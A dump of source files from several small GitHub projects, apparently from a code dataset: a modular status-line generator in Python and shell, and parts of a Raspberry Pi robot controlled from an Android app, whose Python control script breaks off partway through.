table = Scraper.get_emoji_table()\n print(os.path.exists('emojis'))\n if not os.path.exists('emojis'):\n os.makedirs('emojis') \n Scraper.download_images(table)\n" }, { "alpha_fraction": 0.7659574747085571, "alphanum_fraction": 0.7659574747085571, "avg_line_length": 22, "blob_id": "3d2c18cb1920fc31ed33f4c48cf35e5dd2928166", "content_id": "05fa4f85f285ca52c77ec89869a83b37857f9d68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 47, "license_type": "no_license", "max_line_length": 29, "num_lines": 2, "path": "/README.md", "repo_name": "nucle0tides/emoji-scraper", "src_encoding": "UTF-8", "text": "# emoji-scraper\nAn emoji scraper, for science \n" }, { "alpha_fraction": 0.7534246444702148, "alphanum_fraction": 0.7534246444702148, "avg_line_length": 21.538461685180664, "blob_id": "c0175e45df08b6ef9368ab8d10dc4dfb10cf119a", "content_id": "fcc909d30601c7201d3b45f00f0d5ca3513b6021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 292, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/schema.sql", "repo_name": "nucle0tides/emoji-scraper", "src_encoding": "UTF-8", "text": "drop table if exists emojis;\ncreate table emojis (\n id integer primary key autoincrement,\n name text not null,\n url text not null\n);\n\ndrop table if exists categories;\ncreate table categories (\n id integer primary 
key autoincrement,\n emoji_name text not null,\n category text not null \n);" } ]
3
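schema.sql above gives emoji-scraper two tables (emojis with a url per name, and categories with one row per emoji/category pair), and download_images() fills both while saving each image under emojis/&lt;name&gt;.png. A small sketch of reading the data back, assuming the scraper has already run and created database.db in the working directory; the helper name is illustrative:

```python
import sqlite3


def categories_for(name, db_path="database.db"):
    """Hypothetical helper: return (url, category) rows for one emoji,
    joining the two tables that download_images() populates."""
    conn = sqlite3.connect(db_path)
    try:
        return conn.execute(
            "SELECT e.url, c.category "
            "FROM emojis e JOIN categories c ON c.emoji_name = e.name "
            "WHERE e.name = ?",
            (name,),
        ).fetchall()
    finally:
        conn.close()
```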
abbafei/status-info-maker
https://github.com/abbafei/status-info-maker
7b7b79c53995040f6ad4885c2ad0afed7e6f421b
cf40324f4b3d671dc4164bfdc4104c03c4f013ca
2759e4be8b5f0b029bc5089d8166b13b20be4b73
refs/heads/master
2016-09-05T11:30:43.202074
2013-07-14T10:20:36
2013-07-14T10:20:36
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7372881174087524, "alphanum_fraction": 0.7457627058029175, "avg_line_length": 38.33333206176758, "blob_id": "d21e1065abdb3a707f369d94f02cbc37f1cb4505", "content_id": "c25a8a1e4e2fed1ed59b52ea09dd99dcfe09dc39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 354, "license_type": "no_license", "max_line_length": 124, "num_lines": 9, "path": "/processors/repeat.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n'''repeat what was provided standard input the specified amount of times, or indefinitely if amount of times is not given'''\nimport sys\nimport itertools\nimport util\n\ninp = sys.stdin.read()\ntimes = int(sys.argv[1] if (len(sys.argv) > 1) else 0)\nutil.fifo_handler(itertools.islice(itertools.repeat(inp), (times or None)), sys.stdout)\n" }, { "alpha_fraction": 0.7115987539291382, "alphanum_fraction": 0.7115987539291382, "avg_line_length": 21.785715103149414, "blob_id": "6b3e47054c561545df02c0849ea55a0273891283", "content_id": "3485bca4e3a88ee2f4186812d365f42a614ada55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 155, "num_lines": 14, "path": "/processors/format.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#formats items as array of dicts\nimport sys\nimport util\nimport run\n\ndict_actions={\n 'text': None,\n 'cmd': None,\n 'color': None,\n}\n\n\nutil.fifo_handler(run.jsondumpize(run.denewlineize(run.actize(run.dictize(i), dict_actions=dict_actions)) for i in run.jsonloadize(sys.stdin)), sys.stdout)\n" }, { "alpha_fraction": 0.458737850189209, "alphanum_fraction": 0.458737850189209, "avg_line_length": 24.75, "blob_id": "3551257b7f07feaf06e754333281edee7f837d24", "content_id": "8ba1aa566cdbb504a6f6b16f9a4f297834dfae70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "no_license", "max_line_length": 72, "num_lines": 16, "path": "/outputs/xmobar.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport json\nimport util\n\nutil.outputter(\n lambda line: ''.join((\n '}{',\n util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n quoter=lambda s: s.replace('$', '$$'),\n colorer=lambda c, s: ''.join(('<fc=', c, '>', s, '</fc>')),\n connector=' | ',\n quote_connectors=False,\n )\n ))\n)\n" }, { "alpha_fraction": 0.5822222232818604, "alphanum_fraction": 0.5866666436195374, "avg_line_length": 74, "blob_id": "288473e7c7155b0348d2211838d992a2d8143be9", "content_id": "16e590d3f146f1fb41f2f7b2bf4753558bcac47c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 229, "num_lines": 6, "path": "/outputs/i3bar.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport json\nimport util\n\ncmder=lambda inp: json.dumps(filter(lambda a: a != {} and 'full_text' in a, (dict((('full_text', v.strip()) if k == 'text' else (k,v)) for k,v in d.iteritems() if v.strip() != '') for d in json.loads(inp))), separators=(',',':'))\nutil.outputter(lambda line: ''.join((',', cmder(line), '\\n')), do_b4=lambda inp: (''.join(('{\"version\":1}\\n[\\n', cmder(inp.next()), '\\n')),), do_after=lambda inp: 
(']\\n',))\n" }, { "alpha_fraction": 0.5055679082870483, "alphanum_fraction": 0.5456570386886597, "avg_line_length": 73.83333587646484, "blob_id": "b770b5151b98b98cfc9863058d70fa5548930f58", "content_id": "efe24dff3e1a1f786194be0ee23d47db0e96c12b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 449, "license_type": "no_license", "max_line_length": 263, "num_lines": 6, "path": "/demos/run.sh", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/bin/sh\n# uses hebcal <http://danny.sadinoff.com/hebcal/>\ndidir=\"$1\"\necho \"$(printf '[{\"cmd\": \"acpi -b\", \"color\":\"#613770\"}, \" \", {\"cmd\": \"hebcal -T | head -1\", \"color\": \"#0770ff\"}, \" \", {\"cmd\": \"date +%%a\", \"color\": \"#07ff70\"}, \" \", \" \", {\"cmd\": \"date '; printf \"'+%%I:%%M:%%S %%p'\"; printf '\",\"color\": \"#ffffff\"}]'; printf '')\" | \n\t$didir/processors/repeat.py | $didir/processors/wait.py 1 | \n\t$didir/processors/run.py | $didir/outputs/i3bar.py\n" }, { "alpha_fraction": 0.577636182308197, "alphanum_fraction": 0.5845886468887329, "avg_line_length": 30.381818771362305, "blob_id": "e9170cff554dfcbc84948187d30374f9ee3259b1", "content_id": "52cb74358fa582ed34196e187b0b56066021c316", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1726, "license_type": "no_license", "max_line_length": 128, "num_lines": 55, "path": "/util.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys\nimport json\nimport itertools\n\n\n\n\ndef connect_dicts(item, connector=' | ', quoter=lambda text: text, colorer=lambda color, text: text, quote_connectors=True):\n _format_t = lambda t: (lambda pqt: (colorer(t['color'], pqt) if ('color' in t) else pqt))(quoter(t['text']))\n dicts = (_format_t(t) for t in item)\n si = (quoter(connector) if quote_connectors else connector).join(dicts)\n return ''.join((si, \"\\n\"))\n\n\ndef writer_fd(fd):\n def _writer(data):\n fd.write(data)\n fd.flush()\n return _writer\n\n\ndef loopy(inp=iter(sys.stdin.readline, ''), outp=writer_fd(sys.stdout), each_fn=None, b4_fn=None, after_fn=None):\n do_b4 = ((lambda i: ()) if (b4_fn is None) else b4_fn)\n do_each = ((lambda item: ()) if (each_fn is None) else each_fn)\n do_after = ((lambda i: ()) if (after_fn is None) else after_fn)\n for o in itertools.chain(do_b4(inp), itertools.chain.from_iterable(do_each(item) for item in inp), do_after(inp)):\n outp(o)\n\n\ndef outputter(outp_gen=lambda item: item, inp_iter=iter(sys.stdin.readline, ''), outp_fd=sys.stdout, do_b4=None, do_after=None):\n w = writer_fd(outp_fd)\n return loopy(\n inp_iter,\n w,\n b4_fn=do_b4,\n after_fn=do_after,\n each_fn=lambda item: (outp_gen(item),),\n )\n\n\ndef fifo_handler(inp, outp, b4_fn=lambda i: (), after_fn=lambda i: ()):\n write = writer_fd(outp)\n for item in inp:\n for i in b4_fn(item):\n write(i)\n try:\n write(item)\n except IOError as err:\n if err.errno == 32: # Unix: EPIPE Broken Pipe\n break\n else:\n raise\n for i in after_fn(item):\n write(i)\n" }, { "alpha_fraction": 0.6755852699279785, "alphanum_fraction": 0.6856187582015991, "avg_line_length": 41.71428680419922, "blob_id": "d967abff609fc3389ecafaba1f9a5bbd68908a3b", "content_id": "b930eaddf4d3817572998541b4b2d52a936e31ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 129, "num_lines": 7, "path": 
"/processors/join.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n'''wait the specified amount of time (in seconds), default 1'''\nimport sys\nimport util\n\njoin_with = (sys.argv[1] if (len(sys.argv) > 1) else None)\nutil.fifo_handler(iter(sys.stdin.readline, ''), sys.stdout, after_fn=lambda i: ((join_with,) if (join_with is not None) else ()))\n" }, { "alpha_fraction": 0.7572901248931885, "alphanum_fraction": 0.7631811499595642, "avg_line_length": 66.9000015258789, "blob_id": "9f3a500bce18d9ac2803e04051533a83b47a7a32", "content_id": "6a7ff909db7b475a038d7462b6a75112adae107e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 3395, "license_type": "no_license", "max_line_length": 193, "num_lines": 50, "path": "/Readme.txt", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "B\"H\n\n\nA modular, flexible status line maker.\n\nMany status line generators (e.g. i3status, conky, etc.) try to get all the info for the status-bar within one process.\nThis saves lots of resources. However, it also severely limits what can be included in the bar; you can only use what the author adds in.\nTherefore, this utility aims to be flexible and modular, and does about *everything* with separate processes. It takes a little more computing power.\nSmall overhead is also an aim, however, this is only true when it does not limit flexibility much.\n\nSummary:\n\tTools to work with streams of JSON objects specifying text to show, and optionally the colors to show it in.\n\tThe stream format is: JSON arrays, one per line. The arrays contain objects with a \"text\" entry and an optional \"color\" entry.\n\tThe inputs can be in other formats, to be processed by 'processors', as long as there is only one item per line.\n\tThe scripts in 'processors' take input streams and manipulate 1)the items contained therein, 2)the way the items are combined.\n\tThe scripts in 'outputs' take a properly-formatted input stream, or a processed stream, and output the information contained therein.\n\nWintry:\n\tJSON is used to pass data around, and functionality is split up on a CPU-process level (i.e. each utility is a process).\n\tThere are three parts, at present:\n\t\t- input: provided by the user in JSON form.\n\t\t- processors: transform input (processed or original)\n\t\t- outputs: transform input data from JSON into external formats\n\n\tAll these parts either take, give, or both, one or more line(s) of arbitrary JSON arrays, one array per line. (Since newlines in JSON are encoded as \"\\n\", any amount of JSON can be on a line).\n\t*These formats may change in future versions of this code.*\n\tInput format\n\t\tThe input JSON arrays should contain zero or more strings and/or objects (maps).\n\t\tInput strings are shorthand for a map with a \"text\" item containing the string's value.\n\t\tInput maps have\n\t\t\t(1) either a \"text\" item, whose value is of the string type, or a \"cmd\" item, whose value is a shell command string\n\t\t\t(2) optional \"color\" item, which is a string containing a regular 6-hexadecimal-digit color code preceded by a \"#\" (e.g. #770613).\n\tProcessor format\n\t\tCan be arbitrary values, as long as the lines they give *to an output* are in the expected format.\n\t\t(Usually it will be either in input format or in output format. 
\"run\" is the processing utility which transforms from input to output.)\n\tOutput format\n\t\tSame as input format, however only maps are valid, and they contain only a \"text\" item, and optionally a \"color\" item too.\n\n\tGenerally, the output destination determines the way the input and processors are to be used.\n\tThese are generally 2 types of destination:\n\t\t1. takes a stream of status lines, updating its display with new lines when they are read.\n\t\t2. takes a command to run, and an amount of time to pause between each invocation of the command.\n\tIn (1), therefore, you usually want to supply them with a stream of lines, generating new ones at an interval. The 'repeat' and 'wait' processors are very useful for this purpose.\n\tIn (2), you usually want to supply the command to make only one line; the line is then updated when destination *reruns* the command.\n\nThis code was inspired by:\n\t- i3 \"i3status\" and \"i3bar\" utilities\n\t- Python WSGI specification\n\nCurrently licensed BSD.\n" }, { "alpha_fraction": 0.6214689016342163, "alphanum_fraction": 0.6214689016342163, "avg_line_length": 18.66666603088379, "blob_id": "4a47ddf04000eb5e1cb51b9437ef2688c655f65b", "content_id": "d89f0636139dd2b66af24143263cd2c13ae07fcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 68, "num_lines": 9, "path": "/outputs/text.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport json\nimport util\n\nutil.outputter(\n lambda line: util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n )\n)\n" }, { "alpha_fraction": 0.6628820896148682, "alphanum_fraction": 0.663755476474762, "avg_line_length": 51.04545593261719, "blob_id": "0624a2024b3a02b2a2e059b3e37456d89bb58765", "content_id": "417828f0774eabef3a3fb2b5d05dfc1778e02f38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1145, "license_type": "no_license", "max_line_length": 215, "num_lines": 22, "path": "/processors/run.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n'''runs the cmds in the json objects and outputs them as text'''\nimport subprocess\nimport json\nimport sys\n\ndefault_dict_actions={\n 'text': None,\n 'cmd': lambda i: {'text': subprocess.Popen(i['cmd'], shell=True, stdout=subprocess.PIPE).communicate()[0]},\n 'color': None,\n}\ncombine_dicts = lambda xs: dict((k, v) for d in xs for k, v in d.iteritems())\n\ndictize = lambda a: ((i if isinstance(i, dict) else {'text': (i if isinstance(i, basestring) else str(i))}) for i in a)\nactize = lambda t, dict_actions=None: (combine_dicts((({n: d[n]} if a is None else a(d)) if n in d else {}) for n, a in (dict_actions if (dict_actions is not None) else default_dict_actions).iteritems()) for d in t)\ndenewlineize=lambda t: (dict(((k, v.rstrip('\\r\\n')) if k == 'text' else (k,v)) for k,v in d.iteritems()) for d in t)\njsonloadize=lambda inp_fd: (json.loads(i) for i in iter(inp_fd.readline, ''))\njsondumpize=lambda ts: (''.join((json.dumps(tuple(t)), \"\\n\")) for t in ts)\nif __name__ == '__main__':\n import util\n\n util.fifo_handler(jsondumpize(denewlineize(actize(dictize(i))) for i in jsonloadize(sys.stdin)), sys.stdout)\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 31.399999618530273, "blob_id": 
"1b459e036a16d18e058d3231e14bc13dbe9bfcbc", "content_id": "5e9153b0ef156a1dd6569bfe9e4ba3b98fdd5524", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 486, "license_type": "no_license", "max_line_length": 86, "num_lines": 15, "path": "/outputs/html.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# can be used with, among many options, with XMLHTTPRequest multipart push\nimport json\nimport cgi\nimport util\n\nutil.outputter(\n lambda line: util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n quoter=lambda s: cgi.escape(s),\n colorer=lambda c, s: ''.join(('<span style=\"color: ', c, '\">', s, '</span>')),\n connector=' <span style=\"font-weight: bold\">|</span> ',\n quote_connectors=False,\n )\n)\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6074561476707458, "avg_line_length": 75, "blob_id": "5b9497569f66d505b94f970de6670f27035d63f5", "content_id": "1653063429f41e2f75b2940e4720d8d8a7dc4759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 912, "license_type": "no_license", "max_line_length": 276, "num_lines": 12, "path": "/demos/cgi-bin/cgi_html.sh", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\n# uses hebcal <http://danny.sadinoff.com/hebcal/>\n# can be run using a CGI server (for example busybox <http://busybox.net/> httpd -f -p 8000, or python <http://www.python.org/> -m CGIHTTPServer), and going to <http://localhost:8000/cgi-bin/[name_of_this_file]>\nD=\"$(dirname \"$(dirname \"$(readlink -f \"$(dirname \"$(which \"$0\" || echo \"$0\")\")\")\")\")\"\ndidir=\"$D\"\n\nprintf 'Content-Type: text/html\\r\\n\\r\\n'\nprintf '<html><head><meta http-equiv=\"refresh\" content=\"1; url=\"'\necho \"$REQUEST_URI\" | head -c -1\nprintf '\"><title>Jewcal</title></head><body style=\"background: black; color: white\"><p>'\necho \"$(printf '[{\"cmd\": \"hebcal -T | head -1\", \"color\": \"#0770ff\"}, \" \", {\"cmd\": \"date +%%a\", \"color\": \"#07ff70\"}, \" \", {\"cmd\": \"date '; printf \"'+%%I:%%M:%%S %%p'\"; printf '\",\"color\": \"#ffffff\"}]'; printf '')\" | $didir/processors/run.py | $didir/outputs/html.py | head -c -1\nprintf '</p</body></html>'\n" }, { "alpha_fraction": 0.5604650974273682, "alphanum_fraction": 0.5604650974273682, "avg_line_length": 29.714284896850586, "blob_id": "90a59b1cdbcd186e66760a81eb29fbb45bfe7dca", "content_id": "bbb74e5ffff358fc68e3960c69ca1026a593230e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 430, "license_type": "no_license", "max_line_length": 74, "num_lines": 14, "path": "/outputs/conky.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# to be used with conky execp, for example: conky -t '${execp <command>}'\nimport json\nimport util\n\nutil.outputter(\n lambda line: util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n quoter=lambda s: s.replace('$', '$$'),\n colorer=lambda c, s: ''.join(('${color ', c, '}', s, '${color}')),\n connector=' | ',\n quote_connectors=False,\n )\n)\n" }, { "alpha_fraction": 0.648754894733429, "alphanum_fraction": 0.656618595123291, "avg_line_length": 53.5, "blob_id": "86f630d994a1c8e8c95da00f7aadc3e9cfb865a9", "content_id": "6c3a0fe4b725d6208b856788f7be832ae1da8aef", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 763, "license_type": "no_license", "max_line_length": 406, "num_lines": 14, "path": "/outputs/tmux.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# For use with options status-left, status-right, and similar options, by wrapping the command to display a line in \"#(<commands to sh>)\" (including the quotes). *-bg options can be used to change the background colors; *-interval changes how often it is refreshed (so also reran); *-length changes how large the display area is. (color rgb codes are supported from version 1.5 (released in 2011) onwards.)\nimport json\nimport util\n\nutil.outputter(\n lambda line: util.connect_dicts(\n filter(lambda d: d['text'].strip() != '', json.loads(line)),\n quoter=lambda s: s.replace('#', '##'),\n colorer=lambda c, s: ''.join(('[#fg=', c, ']', s, '#[fg=default]')),\n connector='|',\n quote_connectors=False,\n )\n)\n" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.6967741847038269, "avg_line_length": 37.75, "blob_id": "5a22332d2d800b0d3b51b592713cac403754523d", "content_id": "94f04657c45bb56056b9429816b2c9ea6053aa25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 127, "num_lines": 8, "path": "/processors/wait.py", "repo_name": "abbafei/status-info-maker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n'''wait the specified amount of time (in seconds), default 1'''\nimport time\nimport sys\nimport util\n\ninterval = float(sys.argv[1] if (len(sys.argv) > 1) else 1)\nutil.fifo_handler(iter(sys.stdin.readline, ''), sys.stdout, after_fn=lambda i: ((interval > 0) and time.sleep(interval),())[1])\n" } ]
15
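The Readme.txt above specifies the input format precisely: one JSON array per line, holding strings (shorthand for a {"text": ...} map) and/or maps with a "text" or "cmd" entry plus an optional "#rrggbb" "color" entry. A minimal sketch of a script emitting one such line, suitable for piping into processors/run.py and then one of the outputs; the particular commands and colors are placeholders:

```python
import json
import sys

# One input line in the format the Readme describes: "cmd" items are run
# by processors/run.py, and plain strings are shorthand for {"text": ...}.
line = [
    {"cmd": "date +%H:%M:%S", "color": "#ffffff"},  # shell command item
    " ",                                            # shorthand text item
    {"text": "hello", "color": "#07ff70"},          # literal colored text
]
sys.stdout.write(json.dumps(line) + "\n")
```

Piped as in demos/run.sh, such a line would flow through repeat.py, wait.py and run.py before an output script such as i3bar.py or text.py renders it.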
nenadlazic/RPiRobot
https://github.com/nenadlazic/RPiRobot
3980c3d94f1b860848d3066a694479f74a3af163
60d68700c0c4f98b1a20780d4012309d199642e0
9f70bb99a246a9d9e5634207b8b4527c0628d40b
refs/heads/master
2020-03-26T05:55:45.596470
2018-08-31T11:35:02
2018-09-02T22:36:28
144,581,333
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6747676730155945, "alphanum_fraction": 0.6804860830307007, "avg_line_length": 28.787233352661133, "blob_id": "ba595dc4d8f2747abcb43627309fe91c9a5fa613", "content_id": "0f7d6b3fe9542209fa9fc7396aa24f6f07b1be1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1399, "license_type": "no_license", "max_line_length": 85, "num_lines": 47, "path": "/Android application/rpidroid_robot/app/src/main/java/matf/beograd/master/nenadlazic/rpidroid_robot/SingletonVolley.java", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "/**\n * Created by nlazic on 12/26/2017.\n */\npackage matf.beograd.master.nenadlazic.rpidroid_robot;\n\nimport android.content.Context;\n\nimport com.android.volley.Request;\nimport com.android.volley.RequestQueue;\nimport com.android.volley.toolbox.Volley;\n\npublic class SingletonVolley {\n private static SingletonVolley mInstance;\n private RequestQueue mRequestQueue;\n private static Context mContext;\n\n public SingletonVolley(Context context) {\n // Specify the application context\n mContext = context;\n // Get the request queue\n mRequestQueue = getRequestQueue();\n }\n\n public static synchronized SingletonVolley getInstance(Context context) {\n // If Instance is null then initialize new Instance\n if (mInstance == null) {\n mInstance = new SingletonVolley(context);\n }\n // Return SingletonVolley new Instance\n return mInstance;\n }\n\n public RequestQueue getRequestQueue() {\n // If RequestQueue is null the initialize new RequestQueue\n if (mRequestQueue == null) {\n mRequestQueue = Volley.newRequestQueue(mContext.getApplicationContext());\n }\n\n // Return RequestQueue\n return mRequestQueue;\n }\n\n public <T> void addToRequestQueue(Request<T> request) {\n // Add the specified request to the request queue\n getRequestQueue().add(request);\n }\n}" }, { "alpha_fraction": 0.5930232405662537, "alphanum_fraction": 0.5930232405662537, "avg_line_length": 23.714284896850586, "blob_id": "90336763dedeee2e29c94cf399ad18ce92be20ac", "content_id": "af3cd4bd016d2250be0c5d269e71de7a1672e25f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 172, "license_type": "no_license", "max_line_length": 64, "num_lines": 7, "path": "/Web application - test/master_web_app/direction_service.php", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "<?php\n$myfile = fopen(\"test.php\", \"w\") or die(\"Unable to open file!\");\n$txt = 'Hello ' . htmlspecialchars($_POST[\"name\"]) . '!';\nfwrite($myfile, $txt);\nfclose($myfile);\n\n?>" }, { "alpha_fraction": 0.8203834295272827, "alphanum_fraction": 0.8304742574691772, "avg_line_length": 65.13333129882812, "blob_id": "542ab1d96cec900b151f5dcf3e6eea463c667bd3", "content_id": "59487be2bbc67a8e8211800242d5f3f16785a20a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 991, "license_type": "no_license", "max_line_length": 209, "num_lines": 15, "path": "/README.md", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "Ovaj repozitorijum sadrzi moj master rad na temu:\n\n# Daljinska kontrola robota sa Android uredjaja #\n\nNapravljen je mali mobilni robot koji se krece pomocu tockova i motora na njima. 
The robot is controlled by a Raspberry Pi computer mounted on it and accepts commands from an Android application on a mobile phone.\nThe robot carries distance sensors through which it obtains information about the outside world; using that information and the implemented BUG algorithm, it can move autonomously and go around obstacles on an unknown map.\n\nThe source code of the Android application can be seen at:\nhttps://github.com/nenadlazic/RPiRobot/tree/master/Android%20application/rpidroid_robot/app/src/main/java/matf/beograd/master/nenadlazic/rpidroid_robot\n\nThe source code of the Raspberry Pi application can be seen at:\nhttps://github.com/nenadlazic/RPiRobot/tree/master/RPI%20application\n\nThe PDF of the master's thesis is located at:\nhttps://github.com/nenadlazic/RPiRobot/blob/master/Master%20thesis%20-%20text/rpidroid-nenad-lazic.pdf" }, { "alpha_fraction": 0.5812512636184692, "alphanum_fraction": 0.5974488854408264, "avg_line_length": 35.914798736572266, "blob_id": "2cace2fa2872402c2ae56000405d6d233ba2615a", "content_id": "fde5acf2676423fb0d9baaa7714f57650e6b80f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24699, "license_type": "no_license", "max_line_length": 152, "num_lines": 669, "path": "/RPI application/app.py", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "# pscp app.py [email protected]:/home/pi\nimport _thread\nimport threading\nimport collections\nimport RPi.GPIO as GPIO\nimport random\nimport time\nfrom flask import Flask\nfrom flask import request\nfrom time import sleep\nfrom threading import Thread\nfrom enum import Enum\nimport json\n\n# Types of messages that are exchanged\nclass RPi_MSG_TYPE(Enum):\n    RPi_MSG_INVALID = (-1),\n    RPi_MSG_DIRECTION = 0,\n    RPi_MSG_CONNECTING = 1,\n    RPi_MSG_DISCONNECTING = 2,\n    RPi_MSG_AUTO_MODE = 3,\n    RPi_MSG_RESPONSE_OK = 4,\n    RPi_MSG_RESPONSE_FAILURE = 5,\n    RPi_MSG_RESPONSE_OBSTRACLE = 6,\n    RPi_MSG_UNDEFINED = 7\n\n# Possible movement directions\nclass RPi_DIRECTION(Enum):\n    RPi_INVALID = (-1),\n    RPi_STAND = 0,\n    RPi_GO_AHEAD = 1,\n    RPi_GO_AHEAD_SEMI_LEFT = 2,\n    RPi_GO_AHEAD_SEMI_RIGHT = 3,\n    RPi_GO_LEFT = 4,\n    RPi_GO_RIGHT = 5,\n    RPi_GO_BACK = 6,\n    RPi_GO_BACK_SEMI_LEFT = 7,\n    RPi_GO_BACK_SEMI_RIGHT = 8\n\n# Robot operating mode\nclass RPi_AUTO_MODE(Enum):\n    RPi_AUTO_MODE_INVALID = (-1),\n    RPi_AUTO_MODE_ENABLED = 0,\n    RPi_AUTO_MODE_DISABLED = 1\n\n# Possible robot responses\nclass RPi_RESPONSE_OBSTRACLE(Enum):\n    RPi_RESPONSE_INVALID = (-1),\n    RPi_RESPONSE_OK = 0,\n    RPi_FAILURE = 1,\n    RPI_OBSTRACLE_DETECTED = 2,\n    RPI_OBSTRACLE_PASSED = 3\n\n# Possible sides for going around an obstacle\nclass RPi_SIDE(Enum):\n    RPi_SIDE_INVALID = (-1),\n    RPi_SIDE_LEFT = 0,\n    RPi_SIDE_RIGHT = 1,\n    RPi_SIDE_CANNOT_DECIDE = 2\n\n\n# Motor driver pins, shared by the movement functions below\n# Right motor pins\nmotor_right_1A = 3 # Pins 2 and 3 set the rotation direction of the right motor\nmotor_right_2A = 2\nmotor_right_12EN = 4 # Pin for switching the right motor on and off\n\n# Left motor pins\nmotor_left_3A = 20 # Pins 16 and 20 set the rotation direction of the left motor\nmotor_left_4A = 16\nmotor_left_34EN = 21 # Pin for switching the left motor on and off\n\n\n# -------------------------HARDWARE CONTROL MODULE BEGIN--------------------------\ndef checkSensors():\n    # Reads the distance to the nearest obstacle from each sensor\n    # sensor 1 (ahead)\n    PIN_TRIGGER = 7\n    PIN_ECHO = 11\n\n    d_left = -1\n    d_ahead = -1\n    d_right = -1\n\n    # sensor 2 (left)\n    PIN_TRIGGER1 = 13\n    PIN_ECHO1 = 15\n\n    d_left1 = -1\n    d_ahead1 = -1\n    d_right1 = -1\n\n    # sensor 3 (right)\n    PIN_TRIGGER2 = 29\n    PIN_ECHO2 = 31\n\n    d_left2 = -1\n    d_ahead2 = -1\n    d_right2 = -1\n\n\n    GPIO.setup(PIN_TRIGGER,GPIO.OUT)\n    GPIO.setup(PIN_ECHO,GPIO.IN)\n    \n    GPIO.setup(PIN_TRIGGER1,GPIO.OUT)\n    GPIO.setup(PIN_ECHO1,GPIO.IN)\n    \n    GPIO.setup(PIN_TRIGGER2,GPIO.OUT)\n    GPIO.setup(PIN_ECHO2,GPIO.IN)\n    \n    GPIO.output(PIN_TRIGGER,GPIO.LOW)\n    GPIO.output(PIN_TRIGGER1,GPIO.LOW)\n    GPIO.output(PIN_TRIGGER2,GPIO.LOW)\n    \n    print(\"Calculate distance\")\n    \n    # ------sensor 
